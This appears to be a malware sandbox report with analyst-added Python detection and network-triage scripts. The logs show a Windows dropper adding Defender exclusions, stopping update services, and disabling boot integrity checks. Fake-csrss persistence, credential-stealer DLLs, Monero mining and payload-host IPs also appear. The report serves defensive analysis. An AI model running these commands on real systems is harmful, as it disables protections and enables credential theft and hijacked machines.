C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Program Files\Common Files\LVNLYGGZHA\lightcleaner.exe
"C:\Program Files\Common Files\LVNLYGGZHA\lightcleaner.exe" /VERYSILENT
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Users\Admin\AppData\Local\Temp\24-5c628-abd-15e86-1fb13046e514e\Selotemate.exe
"C:\Users\Admin\AppData\Local\Temp\24-5c628-abd-15e86-1fb13046e514e\Selotemate.exe"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"
C:\Users\Admin\AppData\Local\Temp\is-59MQS.tmp\lightcleaner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-59MQS.tmp\lightcleaner.tmp" /SL5="$201D4,833775,56832,C:\Program Files\Common Files\LVNLYGGZHA\lightcleaner.exe" /VERYSILENT
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start https://iplogger.com/1ciGA4
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 396
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.com/1ciGA4
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2112 CREDAT:275457 /prefetch:2
C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
C:\Windows\syswow64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61 C:\Users\Admin\AppData\Local\Temp\1130335503.exe
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231004220120.log C:\Windows\Logs\CBS\CbsPersist_20231004220120.cab
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe
"C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe"
C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe
"C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
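The process tree above is a compact catalogue of the defence-evasion and persistence commands this dropper chain runs through signed system binaries. As an added example (written for this page, not part of the sandbox report or its tooling), the following script turns those observations into command-line detection rules and runs them over a sample list copied from the Processes section, with three benign lines from the same run as negatives. The ATT&CK technique IDs and descriptions are this editor's annotations, not mappings produced by the report.

```python
import re

# Command lines copied from the Processes section of this report (abridged);
# the last three are benign system activity from the same run and must not fire.
SAMPLE_CMDLINES = [
    r'C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER',
    r'C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1',
    r'C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0',
    r'C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force',
    r'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes',
    r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F',
    r'C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"',
    r'C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0',
    r'"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&Exit',
    r'"C:\Windows\System32\cmd.exe" /c taskkill /im "FykH2HsVfDnnj7oZVpqHE25N.exe" /f & erase "C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe" & exit',
    r'"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main',
    r'C:\Windows\Sysnative\bcdedit.exe /v',
    r'wmiadap.exe /F /T /R',
    r'"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231004220120.log C:\Windows\Logs\CBS\CbsPersist_20231004220120.cab',
]

# (ATT&CK technique, what the rule catches, case-insensitive pattern). The IDs are
# this editor's mapping; tune the patterns to your own telemetry before deploying.
RULES = [
    ("T1553.006", "bcdedit adds a boot entry or turns off code integrity / recovery",
     r"\bbcdedit(\.exe)?\b.*?(\bnointegritychecks\s+1\b|\btestsigning\s+on\b|\brecoveryenabled\s+0\b|-create\b.*\bOSLOADER\b)"),
    ("T1562.001", "Windows Update / WaaSMedic services stopped",
     r"\bsc(\.exe)?\s+stop\s+(UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)\b"),
    ("T1562.001", "Defender exclusion added with Add-MpPreference",
     r"\bAdd-MpPreference\b.*-Exclusion(Path|Process|Extension)\b"),
    ("T1562.004", "inbound allow rule added to the Windows firewall",
     r"\bnetsh\b.*\badvfirewall\s+firewall\s+add\s+rule\b.*\baction=allow\b"),
    ("T1053.005", "scheduled task created as SYSTEM or with highest run level",
     r"\bschtasks(\.exe)?\b.*/create\b.*(/ru\s+\"?system\"?|/rl\s+highest)"),
    ("T1496", "sleep and hibernate timeouts zeroed (keeps a miner host awake)",
     r"\bpowercfg\s+/x\s+-(standby|hibernate)-timeout-(ac|dc)\s+0\b"),
    ("T1222.001", "cacls denies the interactive user access to a dropped payload",
     r"\bcacls\b.*?/P\s+\"[^\"]+:N\""),
    ("T1070.004", "self-deletion via taskkill followed by erase/del",
     r"\btaskkill\b.*\s/f\b.*&\s*(erase|del)\b"),
    ("T1218.011", "rundll32 loads a DLL from the user profile",
     r"\brundll32(\.exe)?\"?\s+C:\\Users\\[^\s,]+\.dll\b"),
]
RULES = [(tid, desc, re.compile(pat, re.IGNORECASE)) for tid, desc, pat in RULES]


def scan(cmdlines):
    """Return a (technique, description, cmdline) tuple for every rule hit on every line."""
    hits = []
    for line in cmdlines:
        for technique, description, pattern in RULES:
            if pattern.search(line):
                hits.append((technique, description, line))
    return hits


def techniques_seen(cmdlines):
    """Distinct technique IDs that fired, sorted, for a one-line triage summary."""
    return sorted({technique for technique, _, _ in scan(cmdlines)})


if __name__ == "__main__":
    for technique, description, line in scan(SAMPLE_CMDLINES):
        print("%-10s %s\n           %s" % (technique, description, line))
    print("techniques:", ", ".join(techniques_seen(SAMPLE_CMDLINES)))
```

The bcdedit rule deliberately ignores read-only invocations such as the bcdedit /v the sample also runs, and the sc rule is scoped to the update and medic services this family stops; both are the first places to widen if your environment shows other variants.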
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| DE | 148.251.234.93:443 | yip.su | tcp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | downloads.digitalpulsedata.com | udp |
| RU | 5.42.64.10:80 | 5.42.64.10 | tcp |
| US | 8.8.8.8:53 | ji.fhauiehgha.com | udp |
| US | 85.217.144.143:80 | 85.217.144.143 | tcp |
| US | 8.8.8.8:53 | flyawayaero.net | udp |
| US | 8.8.8.8:53 | jetpackdelivery.net | udp |
| US | 8.8.8.8:53 | bolidare.beget.tech | udp |
| US | 8.8.8.8:53 | lycheepanel.info | udp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| US | 85.217.144.143:80 | 85.217.144.143 | tcp |
| US | 8.8.8.8:53 | goboh2b.top | udp |
| US | 8.8.8.8:53 | link.storjshare.io | udp |
| US | 104.21.32.208:443 | lycheepanel.info | tcp |
| US | 188.114.97.1:443 | jetpackdelivery.net | tcp |
| US | 172.67.216.81:443 | flyawayaero.net | tcp |
| RU | 45.8.228.16:80 | goboh2b.top | tcp |
| NL | 13.227.219.122:443 | downloads.digitalpulsedata.com | tcp |
| US | 136.0.77.2:443 | link.storjshare.io | tcp |
| NL | 185.26.182.111:80 | net.geo.opera.com | tcp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| RU | 91.106.207.50:80 | bolidare.beget.tech | tcp |
| US | 8.8.8.8:53 | potatogoose.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 172.67.180.173:443 | potatogoose.com | tcp |
| NL | 88.221.25.169:80 | apps.identrust.com | tcp |
| NL | 88.221.25.153:80 | apps.identrust.com | tcp |
| HK | 103.100.211.218:80 | ji.fhauiehgha.com | tcp |
| US | 8.8.8.8:53 | justsafepay.com | udp |
| US | 188.114.96.0:443 | justsafepay.com | tcp |
| US | 8.8.8.8:53 | z.nnnaajjjgc.com | udp |
| US | 8.8.8.8:53 | link.storjshare.io | udp |
| US | 136.0.77.2:80 | link.storjshare.io | tcp |
| MU | 156.236.72.121:443 | z.nnnaajjjgc.com | tcp |
| US | 8.8.8.8:53 | demo.seafile.com | udp |
| DE | 168.119.152.22:80 | demo.seafile.com | tcp |
| BG | 193.42.32.29:80 | 193.42.32.29 | tcp |
| DE | 168.119.152.22:443 | demo.seafile.com | tcp |
| RU | 5.42.64.10:80 | 5.42.64.10 | tcp |
| RU | 5.42.64.10:80 | 5.42.64.10 | tcp |
| US | 8.8.8.8:53 | m7val1dat0r.info | udp |
| US | 188.114.97.0:443 | m7val1dat0r.info | tcp |
| US | 8.8.8.8:53 | app.nnnaajjjgc.com | udp |
| HK | 154.221.26.108:80 | app.nnnaajjjgc.com | tcp |
| US | 8.8.8.8:53 | script.google.com | udp |
| DE | 172.217.23.206:80 | script.google.com | tcp |
| DE | 172.217.23.206:443 | script.google.com | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| US | 8.8.8.8:53 | connectini.net | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 91.109.116.11:443 | connectini.net | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| JP | 23.207.106.113:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | script.googleusercontent.com | udp |
| NL | 142.251.36.1:443 | script.googleusercontent.com | tcp |
| DE | 116.203.7.13:80 | 116.203.7.13 | tcp |
| US | 8.8.8.8:53 | wewewe.s3.eu-central-1.amazonaws.com | udp |
| US | 8.8.8.8:53 | link.storjshare.io | udp |
| DE | 52.219.171.170:443 | wewewe.s3.eu-central-1.amazonaws.com | tcp |
| US | 136.0.77.2:443 | link.storjshare.io | tcp |
| US | 8.8.8.8:53 | vibrator.s3.pl-waw.scw.cloud | udp |
| US | 136.0.77.2:443 | link.storjshare.io | tcp |
| PL | 151.115.10.1:443 | vibrator.s3.pl-waw.scw.cloud | tcp |
| US | 8.8.8.8:53 | 360devtracking.com | udp |
| GB | 91.109.116.11:80 | 360devtracking.com | tcp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | xmr.2miners.com | udp |
| DE | 162.19.139.184:12222 | xmr.2miners.com | tcp |
| US | 8.8.8.8:53 | 873adf6a-6f71-4482-99eb-fc7c976f0505.uuid.safarimexican.net | udp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.70.36:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard58.blob.core.windows.net | udp |
| US | 20.150.70.36:443 | vsblobprodscussu5shard58.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | stun1.l.google.com | udp |
| US | 8.8.8.8:53 | server8.safarimexican.net | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 142.251.125.127:19302 | stun1.l.google.com | udp |
| BG | 185.82.216.65:443 | server8.safarimexican.net | tcp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | mastertryprice.com | udp |
| US | 172.67.212.103:443 | mastertryprice.com | tcp |
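The network table above mixes DNS lookups (UDP/53 rows whose hostname is the name being resolved) with the TCP connections that follow them, and it repeats a row for every connection made. As an added example, not part of the sandbox report, the following Python script parses rows in that layout, pairs each resolution with its follow-on connections, counts repeats, lists names that were resolved but never connected to, and tags destinations an analyst would check first. The sample rows are copied from the table; the suffix lists used for tagging (mining pool, IP-logging tracker, legitimate services abused as payload hosts or dead-drop resolvers) are this example's own assumptions and not classifications made by the sandbox.

```python
import re
from collections import Counter, defaultdict

# Constructed sample: rows copied from the report's network table above,
# in its "| country | ip:port | hostname | proto |" layout.
SAMPLE_ROWS = """
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| US | 8.8.8.8:53 | xmr.2miners.com | udp |
| DE | 162.19.139.184:12222 | xmr.2miners.com | tcp |
| US | 8.8.8.8:53 | 873adf6a-6f71-4482-99eb-fc7c976f0505.uuid.safarimexican.net | udp |
| US | 8.8.8.8:53 | wewewe.s3.eu-central-1.amazonaws.com | udp |
| DE | 52.219.171.170:443 | wewewe.s3.eu-central-1.amazonaws.com | tcp |
| DE | 116.203.7.13:80 | 116.203.7.13 | tcp |
"""

ROW_RE = re.compile(
    r"^\|\s*([A-Z]{2})\s*\|\s*([\d.]+):(\d+)\s*\|\s*(\S+)\s*\|\s*(tcp|udp)\s*\|$"
)
IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Suffix lists are this example's own assumptions (an analyst's local
# knowledge), not classifications made by the sandbox.
MINING_POOL_SUFFIXES = ("2miners.com",)
TRACKER_SUFFIXES = ("iplogger.com",)
ABUSED_LEGIT_SUFFIXES = (
    "t.me", "amazonaws.com", "storjshare.io", "scw.cloud",
    "cdn.discordapp.com", "steamcommunity.com",
    "script.google.com", "script.googleusercontent.com",
)


def parse_rows(text):
    """Turn table rows into dicts; lines that are not rows are skipped."""
    rows = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            cc, ip, port, host, proto = m.groups()
            rows.append({"cc": cc, "ip": ip, "port": int(port),
                         "host": host, "proto": proto})
    return rows


def is_dns_lookup(row):
    """The sandbox logs each resolution as a UDP/53 row whose 'host' is the
    name being looked up, so DNS rows pair with later TCP rows by name."""
    return row["proto"] == "udp" and row["port"] == 53


def _has_suffix(host, suffixes):
    return any(host == s or host.endswith("." + s) for s in suffixes)


def tag_host(host, ports):
    """Label a destination with the properties an analyst checks first."""
    tags = []
    if IP_RE.match(host):
        tags.append("direct-ip")             # no DNS: hard-coded payload/C2 host
    if _has_suffix(host, MINING_POOL_SUFFIXES):
        tags.append("mining-pool")
    if _has_suffix(host, TRACKER_SUFFIXES):
        tags.append("tracker")               # install-count / victim-IP beacon
    if _has_suffix(host, ABUSED_LEGIT_SUFFIXES):
        tags.append("abused-legit-service")  # dead-drop resolver or payload host
    if any(p not in (80, 443) for p in ports):
        tags.append("nonstandard-port")
    return tags


def triage(text):
    rows = parse_rows(text)
    connections = Counter()          # (host, ip, port, proto) -> times seen
    ports_by_host = defaultdict(set)
    looked_up = set()
    for r in rows:
        if is_dns_lookup(r):
            looked_up.add(r["host"])
            continue
        connections[(r["host"], r["ip"], r["port"], r["proto"])] += 1
        ports_by_host[r["host"]].add(r["port"])
    # Names resolved but never connected to: NXDOMAIN, a blocked connect, or a
    # per-victim generated label (the uuid.* name above) used as a dead drop.
    dns_only = sorted(looked_up - set(ports_by_host))
    all_hosts = looked_up | set(ports_by_host)
    tags = {h: tag_host(h, ports_by_host.get(h, set())) for h in all_hosts}
    return {"connections": connections, "dns_only": dns_only, "tags": tags}


if __name__ == "__main__":
    result = triage(SAMPLE_ROWS)
    for key, n in result["connections"].most_common():
        print(n, key, result["tags"][key[0]])
    print("DNS only:", result["dns_only"])
```

Run against the full table, the repeat counts separate one-off payload downloads from the beaconing to iplogger.com and t.me, the pool name on a non-HTTP port stands out on its own, and the bare-IP HTTP fetch never appears in the DNS rows at all, so a detection built only on DNS logs would miss it.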
Files
memory/2408-0-0x00000000009C0000-0x0000000000A1E000-memory.dmp
memory/2408-1-0x0000000074980000-0x000000007506E000-memory.dmp
memory/2408-2-0x0000000004E00000-0x0000000004E40000-memory.dmp
memory/2408-3-0x0000000000500000-0x0000000000544000-memory.dmp
memory/2408-4-0x0000000000640000-0x000000000065A000-memory.dmp
memory/2264-5-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2264-7-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2264-9-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2408-10-0x0000000074980000-0x000000007506E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab5F32.tmp
| MD5 | f3441b8572aae8801c04f3060b550443 |
| SHA1 | 4ef0a35436125d6821831ef36c28ffaf196cda15 |
| SHA256 | 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf |
| SHA512 | 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9 |
C:\Users\Admin\AppData\Local\Temp\Tar5FD1.tmp
| MD5 | 9441737383d21192400eca82fda910ec |
| SHA1 | 725e0d606a4fc9ba44aa8ffde65bed15e65367e4 |
| SHA256 | bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5 |
| SHA512 | 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 549299d0ef99b448b3fda55988424fa9 |
| SHA1 | 59e3ec623526ceb52e29c1689c10e1c6946078f4 |
| SHA256 | 56a3ffe51cabb84d03aa71e92064c09ae76eea33d5480f5603ba349644d2842e |
| SHA512 | 706ad9a734fe4ad926fe2e6f644e175bb17a22f2198d111a7ac01df206d625b9b1507a46fdee1848147eb44537d048e7203cea230c8a4449b064cc90e9e640f2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ba45772adb000d083a1400cbfbbee971 |
| SHA1 | 5db6de5b5c28c27ebc63060ff5f33f562b00506f |
| SHA256 | f4715e640eb4b5b39a1379ee4e251f4e7429cdf42406474b4da0943af2788e18 |
| SHA512 | 2a86b40cef7570339e3ee7323c6038ad523e47a02f7e648fbe95b4f57f784d879a7933b5b043c29ffe8c2da64d82685d8e0c9b60ee0520a2e6c9d3861bdeefda |
\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe
| MD5 | aebaf57299cd368f842cfa98f3b1658c |
| SHA1 | cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7 |
| SHA256 | d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce |
| SHA512 | 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e |
C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe
| MD5 | aebaf57299cd368f842cfa98f3b1658c |
| SHA1 | cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7 |
| SHA256 | d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce |
| SHA512 | 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e |
C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe
| MD5 | 2565bdf6fc65a0c1568391c5b354e4a2 |
| SHA1 | b5a58b0013c0df31f23e9b3b93c8aa15f8ea7502 |
| SHA256 | 5e89d8a9b19c40d194ca85db9d1df408b6771e0343a708de58d4e418f31ab697 |
| SHA512 | 9499f0fbbabcb27ade5a84c4a30acd0143f887c58e6a4b910bae76e8fdc931da3fe821891262a4f4b00486211623047eb0e2a926486f390792f0be5625538449 |
\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe
| MD5 | 2565bdf6fc65a0c1568391c5b354e4a2 |
| SHA1 | b5a58b0013c0df31f23e9b3b93c8aa15f8ea7502 |
| SHA256 | 5e89d8a9b19c40d194ca85db9d1df408b6771e0343a708de58d4e418f31ab697 |
| SHA512 | 9499f0fbbabcb27ade5a84c4a30acd0143f887c58e6a4b910bae76e8fdc931da3fe821891262a4f4b00486211623047eb0e2a926486f390792f0be5625538449 |
C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe
| MD5 | 6172d07e0711bc23642c3b6b86e4fec7 |
| SHA1 | c49a6bb96d15baa7d58ff9808c3311454959157b |
| SHA256 | 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6 |
| SHA512 | 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b |
memory/1664-168-0x00000000025B0000-0x00000000029A8000-memory.dmp
C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe
| MD5 | 006ad74c21256de16ed0f79f760dc2da |
| SHA1 | 03372373476c4ffad5a4016950e5834451872c3f |
| SHA256 | c4410af6b21ec0894ede95baaf3314f8260ab62051abe107b83b5c3d091e97f4 |
| SHA512 | c7184ab98553159d9b05ef3a3ec5a3036159683a7aed963193a77b17df900ba8fd7dedf85fa67525acc6bd3bdfc403f8622a8c3c6edcac38abb5c79f432e43df |
